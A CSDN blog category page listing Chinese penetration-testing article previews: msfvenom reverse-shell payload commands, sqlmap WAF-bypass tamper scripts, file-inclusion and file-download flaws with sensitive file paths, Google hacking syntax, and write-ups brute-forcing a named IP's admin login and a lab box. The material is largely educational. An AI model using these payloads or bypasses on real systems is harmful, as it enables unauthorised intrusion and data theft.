![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透
文章平均质量分 78
L_lemo004
这个作者很懒,什么都没留下…
展开
-
基础
基础一、常用术语脚本(asp,php,jsp)html(css,js,html)HTTP协议CMS(B/S)MD5信息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位的散列值(hash value),用于确保信息传输完整一致。抓鸡利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为。跳板使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息。一句话通原创 2020-10-20 23:59:44 · 494 阅读 · 0 评论 -
MSF命令大全
0x00 Payload生成Windows/LinuxWindows:msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名WebPHP:msfvenom -p php/meter原创 2020-10-20 23:59:00 · 5625 阅读 · 0 评论 -
命令执行漏洞
命令执行漏洞漏洞描述命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一。如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致,可以执行命令的函数有system( )、exec( )、shell_exec( )、passthru( )、pcntl_execl( )、popen( )、proc_open( )等。当攻击者可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击。PHP执行命令是继承WebServer用原创 2020-10-20 23:58:12 · 1333 阅读 · 0 评论 -
sqlmap常用绕过脚本
使用方法–tamper xxx.pyapostrophemask.py用UTF-8全角字符替换单引号字符apostrophenullencode.py用非法双字节unicode字符替换单引号字符appendnullbyte.py在payload末尾添加空字符编码base64encode.py对给定的payload全部字符使用Base64编码between.py分别用“NOTBETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”bluec原创 2020-10-20 23:57:37 · 1261 阅读 · 0 评论 -
MSF常用命令
Msf是kali下的这款强劲的专用工具,开源系统的网络安全问题测试工具前渗入后渗入环节都用获得,只有還是后渗入环节用的多。Msf用途大概就是说exploit进攻,cve进攻,远程控制木马病毒进攻运用。Msfconsole 开启msfMsfconsole -h 协助选择项Banner 用以查询metasploit的版本信息,运用控制模块总数、payload总数控制模块详细介绍:Exploits 渗入进攻控制模块 主要用于进攻方式Auxiliary 輔助控制模块 主要用于信息内容搜集Payloa原创 2020-10-20 23:56:41 · 2576 阅读 · 0 评论 -
EXP查询合集提权后渗透必备-------后渗透提权常用漏洞
后渗透提权常用漏洞CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects inmemory] (Windows 7/8/10/2008/2012/2016/2019)CVE-2018-8639 [An elevation of privilege vulnerability exists in原创 2020-10-20 23:55:59 · 664 阅读 · 0 评论 -
代码执行
代码执行当应用在调用一些能将字符转化为代码的函数(如PHP中的eval)时,没有考虑用户是否能控制这个字符串,这就会造成代码执行漏洞。成因:应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。概念:代码的执行来自于缺乏严格的过滤活着用户控制数据的逃逸。在这里由于攻击者可以控制部分或者所有内容传递给这些未进行严格过滤的函数,从而导致提交的内容会被作为PHP代码执行分类常见敏感函数(代码执行函数)eval()原创 2020-10-20 23:54:27 · 398 阅读 · 0 评论 -
浅析文件上传漏洞
文章目录文件上传成因客户端校验服务器校验原理危害防御解析漏洞文件上传成因对于上传文件的后缀名(扩展名)没有做较为严格的限制对于上传文件的MIMETYPE 没有做检查权限上没有控制对于上传的文件的文件权限,(尤其是对于shebang类型的文件)对于web server对于上传文件或者指定目录的行为没有做限制客户端校验前段js验证可通过审计修改js代码或burp改包绕过服务器校验content-type字段校验将Content-Type修改为image/gif,或者原创 2020-10-20 23:50:44 · 308 阅读 · 0 评论 -
Google hack语法
0x00 网上搜集整理的一些可能会用到的Googlehack语法intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定 版本名称的各类 web 程序,也可用 allintitleinurl: 从 url 中搜索指定的关键字,可专门用来构造各种形式 的漏洞 url,也可用 allinurlintext: 从网页中搜索指定的关键字,经常会用它来穿透到漏 洞页面……也可用 allintextfiletype: 搜索指定的文件后缀,例如:sql mdb txt bak backup原创 2020-09-22 23:26:48 · 2787 阅读 · 0 评论 -
PHP伪协议
//文件读取相关函数include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file0x00 PHP伪协议基于函数include()和include_once()两个的利用情况有如下的协议:file:// — 访问本地文件系统http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsphp:// —原创 2020-09-22 23:23:52 · 379 阅读 · 0 评论 -
文件包含漏洞
文章目录什么是文件包含文件包含漏洞成因PHP文件包含的函数文件包含漏洞分类本地文件包含漏洞总结远程文件包含漏洞PHP内置封装协议常用php://文件包含漏洞之伪协议data:text/plain[ php://input](https://links.jianshu.com/go?to=php%3A%2F%2Finput)[ php://filter](https://links.jianshu.com/go?to=php%3A%2F%2F原创 2020-09-22 23:22:25 · 451 阅读 · 0 评论 -
DDOS攻击(分布式拒绝服务)
文章目录DDOS攻击(分布式拒绝服务)原理:攻击者想办法让目标服务器的磁盘空间、内存、进程、网络带宽等资源被占满,从而导致正常用户无法访问。危害类型防御附:IP Spoof: 即IP地址欺骗,是一台主机设备冒充另外一台主机的IP地址,与其它设备通信,从而达到某种目的技术。属于IP Spoof类的攻击还有TCP 半连接攻击,也就是SYN Flood攻击DDOS攻击(分布式拒绝服务)原理:攻击者想办法让目标服务器的磁盘空间、内存、进程、网络带宽等资源被占满,从而导致正常用户无法访问。攻击者进行拒绝服务攻击原创 2020-09-22 23:20:03 · 1740 阅读 · 0 评论 -
浅谈暴力破解及验证码安全
文章目录一、暴力破解及验证码安全注意事项二、C/S架构暴力猜解三、B/S架构暴力猜解四、Hydra安装及使用安装参数说明各种用法实例五、防范暴力猜解六、验证码安全工作原理存在的问题图片验证码的生成可能存在如下问题在验证码的程序实现流程方面可能存在如下问题对抗现状验证码未来可能的主要形式操作验证码安全0x01 验证码可重用0x02 验证码可识别0x03 客户端生成/显示/校验0x04 空验证码绕过0x05 验证码数量有限0x06 是否校验可控0x07 超过次数才开启验证码0x08 验证码可预测身份验证码安全0原创 2020-09-22 23:19:05 · 2916 阅读 · 2 评论 -
目录遍历漏洞
文章目录目录遍历概念漏洞成因漏洞利用二、目录遍历漏洞第二种情况应用程序操作文件,限制不严时导致访问Web目录以外的文件,包括读写文件和远程执行代码特征测试方法绕过字符过滤利用DVWA进行漏洞测试利用远程文件包含漏洞代码执行权限配置不当引起的本地文件包含漏洞防御措施目录遍历概念目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是web根目录以外的文件),甚至执行系统命令。原创 2020-09-22 23:17:30 · 1645 阅读 · 0 评论 -
任意文件下载漏洞
文章目录任意文件下载0x01 漏洞介绍0x02 漏洞产生原因0x03 漏洞发现Google search一般链接形式包含参数利用方法WEB-INF0x04 漏洞绕过0x05 漏洞利用常见利用文件路径WindowsLinux0x06 漏洞判断0x07 漏洞验证0x08 漏洞防护通用文件下载漏洞修复0x09 文件路径汇总任意文件读取漏洞漏洞产生原因任意文件读取文件读取函数漏洞验证任意文件读取验证任意文件下载0x01 漏洞介绍一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户原创 2020-09-22 23:12:56 · 4113 阅读 · 0 评论 -
任意文件下载/读取漏洞
文章目录任意文件下载/读取可下载文件WindowsLinuxSSHNginx任意文件读取的利用思路进一步推断系统版本无痕反弹shell常用默认路径整理sshNginxApachejettyresintomcatsvn一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意敏感文件利用条件危害利用思路目的漏洞验证修复方案任意文件下载/读取可下载文件WindowsC:\boot.ini //查看系统版本C:\Windows\Syst原创 2020-09-22 23:08:53 · 2392 阅读 · 0 评论 -
PHP网页常见漏洞
PHP网页的安全性问题针对PHP的网站主要存在下面几种攻击方式:1.命令注入(Command Injection)2.eval注入(Eval Injection)3.客户端脚本攻击(Script Insertion)4.跨网站脚本攻击(Cross Site Scripting, XSS)5.SQL注入攻击(SQL injection)6.跨网站请求伪造攻击(Cross Site Re...原创 2019-07-20 21:19:13 · 2119 阅读 · 0 评论 -
内网渗透之一次域环境的渗透测试
0x01 寻找后台IP:39.106.226.95:9235进入网页,是一个html网站使用御剑扫描一下发现robots.txt文件,管理员经常将后台地址保存在此文件中发现后台地址果然被保存在此文件中访问进入后台尝试抓包进行爆破成功跑出后台登录密码 passw0rd登录后台,选择全功能版成功进入后台0x02 文件上传首页处显示为IIS6.0搭建,可以利用II...原创 2019-07-12 22:52:11 · 746 阅读 · 1 评论 -
SQLmap常用参数
-u --url 指定目标url-m 从文本中获取多个目标扫描-r 从文件中加载HTTP请求--data 以POST方式提交数据-random-agent 随机ua--user-agent 指定ua--delay 设置请求间的延迟--timeout 指定超时时间--dbms 指定db,sqlmap支持的db有MySQL、Oracle、PostgreSQL、Microsoft SQL...原创 2019-07-12 21:59:18 · 1525 阅读 · 0 评论 -
billu b0x靶场的渗透测试
扫描IP由于我的内网网段为31,所以我使用ipscan工具扫描31段的存活主机发现192.168.31.16疑似靶场IP,访问看看,成功访问,界面是白胡子页面提示我们用SQL注入获取用户名密码,在输入框尝试注入,输入admin’ ,弹出try again提示框,说明无法注入文件包含无法注入,我们可以尝试爆破目录看看有没有什么突破点得到页面较多,test.php、add.php、...原创 2019-07-12 20:05:07 · 779 阅读 · 0 评论